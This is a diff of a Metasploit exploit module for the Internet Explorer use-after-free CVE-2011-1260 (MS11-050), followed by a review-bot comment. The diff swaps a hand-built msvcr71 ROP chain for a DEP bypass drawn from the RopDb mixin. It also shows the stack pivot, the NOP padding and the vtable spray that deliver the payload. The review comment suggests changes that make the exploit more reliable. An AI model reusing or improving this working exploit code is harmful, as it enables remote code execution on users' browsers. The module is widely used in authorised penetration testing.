1
- ##
2
- # $Id$
3
- ##
4
-
5
1
##
6
2
# This file is part of the Metasploit Framework and may be subject to
7
3
# redistribution and commercial restrictions. Please see the Metasploit
@@ -15,19 +11,14 @@ class Metasploit3 < Msf::Exploit::Remote
15
11
Rank = NormalRanking
16
12
17
13
include Msf ::Exploit ::Remote ::HttpServer ::HTML
14
+ include Msf ::Exploit ::RopDb
18
15
include Msf ::Exploit ::Remote ::BrowserAutopwn
19
16
autopwn_info ( {
20
17
:ua_name => HttpClients ::IE ,
21
18
:ua_minver => "7.0" ,
22
19
:ua_maxver => "8.0" ,
23
20
:javascript => true ,
24
- :os_name => OperatingSystems ::WINDOWS ,
25
- # If it's IE 8, then we need .net to bypass ASLR
26
- :vuln_test => %Q|
27
- if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
28
- if (/.NET CLR 2\\ .0\\ .50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
29
- }
30
- | ,
21
+ :os_name => OperatingSystems ::WINDOWS
31
22
} )
32
23
33
24
def initialize ( info = { } )
@@ -46,30 +37,29 @@ def initialize(info={})
46
37
to bypass DEP (Data Execution Prevention).
47
38
} ,
48
39
'License' => MSF_LICENSE ,
49
- 'Version' => "$Revision$" ,
50
40
'Author' =>
51
41
[
52
42
'd0c_s4vage' , #Discovery, poc
53
43
'sinn3r' , #ROP (thx corelanc0d3r), Windows 7
54
- 'bannedit' , #Windows 7
44
+ 'bannedit' #Windows 7
55
45
] ,
56
46
'References' =>
57
47
[
58
48
[ 'CVE' , '2011-1260' ] ,
59
49
[ 'OSVDB' , '72950' ] ,
60
50
[ 'MSB' , 'MS11-050' ] ,
61
- [ 'URL' , 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html' ] ,
51
+ [ 'URL' , 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html' ]
62
52
] ,
63
53
'DefaultOptions' =>
64
54
{
65
55
'EXITFUNC' => 'process' ,
66
- 'InitialAutoRunScript' => 'migrate -f' ,
56
+ 'InitialAutoRunScript' => 'migrate -f'
67
57
} ,
68
58
'Payload' =>
69
59
{
70
60
'Space' => 500 ,
71
61
'BadChars' => "\x00 \x09 \x0a \x0d '\\ " ,
72
- 'StackAdjustment' => -3500 ,
62
+ 'StackAdjustment' => -3500
73
63
} ,
74
64
'Platform' => 'win' ,
75
65
'Targets' =>
@@ -185,42 +175,16 @@ def on_request_uri(cli, request)
185
175
return
186
176
end
187
177
188
- #In case we're using ROP, initialize it now
189
- code = ''
190
-
191
178
if mytarget [ 'Rop' ]
192
- # !mona -m msvcr71 rop
193
- code = [
194
- 0x7c376402 , # POP EBP # RETN [msvcr71.dll]
195
- 0x7c376402 , # skip 4 bytes [msvcr71.dll]
196
- 0x7c347f97 , # POP EAX # RETN [msvcr71.dll]
197
- 0xfffff800 , # Value to negate, will become 0x00000201 (dwSize)
198
- 0x7c351e05 , # NEG EAX # RETN [msvcr71.dll]
199
- 0x7c354901 , # POP EBX # RETN [msvcr71.dll]
200
- 0xffffffff ,
201
- 0x7c345255 , # INC EBX # FPATAN # RETN [msvcr71.dll]
202
- 0x7c352174 , # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
203
- 0x7c344f87 , # POP EDX # RETN [msvcr71.dll]
204
- 0xffffffc0 , # Value to negate, will become 0x00000040
205
- 0x7c351eb1 , # NEG EDX # RETN [msvcr71.dll]
206
- 0x7c34d201 , # POP ECX # RETN [msvcr71.dll]
207
- 0x7c38b001 , # &Writable location [msvcr71.dll]
208
- 0x7c34b8d7 , # POP EDI # RETN [msvcr71.dll]
209
- 0x7c347f98 , # RETN (ROP NOP) [msvcr71.dll]
210
- 0x7c364802 , # POP ESI # RETN [msvcr71.dll]
211
- 0x7c3415a2 , # JMP [EAX] [msvcr71.dll]
212
- 0x7c347f97 , # POP EAX # RETN [msvcr71.dll]
213
- 0x7c37a151 , # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
214
- 0x7c378c81 , # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
215
- 0x7c345c30 , # ptr to 'push esp # ret ' [msvcr71.dll]
216
- ] . pack ( "V*" )
217
-
218
- code << "\x90 " *20 #Nops
219
- code << "\xeb \x04 \xff \xff " #Jmp over the pivot
220
- code << [ mytarget . ret ] . pack ( 'V' ) #Stack pivot
179
+ p = make_nops ( 44 ) #Nops
180
+ p << "\xeb \x04 \xff \xff " #Jmp over the pivot
181
+ p << [ mytarget . ret ] . pack ( 'V' ) #Stack pivot
182
+ p << payload . encoded
183
+
184
+ rop_payload = generate_rop_payload ( 'java' , p )
221
185
end
222
186
223
- code << payload . encoded
187
+ code = ( rop_payload ) ? rop_payload : payload . encoded
224
188
225
189
# fill the vtable
226
190
vtable = [ mytarget [ 'TargetAddr' ] ] . pack ( 'V*' )
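Review bot: `code = ( rop_payload ) ? rop_payload : payload . encoded` reads `rop_payload` on the non-ROP path where it was never assigned; Ruby resolves it as nil because the assignment appears earlier in the method body, but that relies on parse-order local hoisting and breaks silently if the assignment inside the `if` is ever moved. Replacing the removed `code = ''` with an explicit `rop_payload = nil` before `if mytarget [ 'Rop' ]` makes the fallback intent clear. It also makes the failure mode visible: should `generate_rop_payload ( 'java' , p )` return nil, the current ternary would quietly send a non-ROP payload to a target that was chosen for ROP, so a `print_error`/`fail_with` on a nil result inside that branch seems preferable to the silent fallback. The local `p` shadows `Kernel#p`; a name such as `stage` reads better. `on_request_uri` begins before and continues after this hunk.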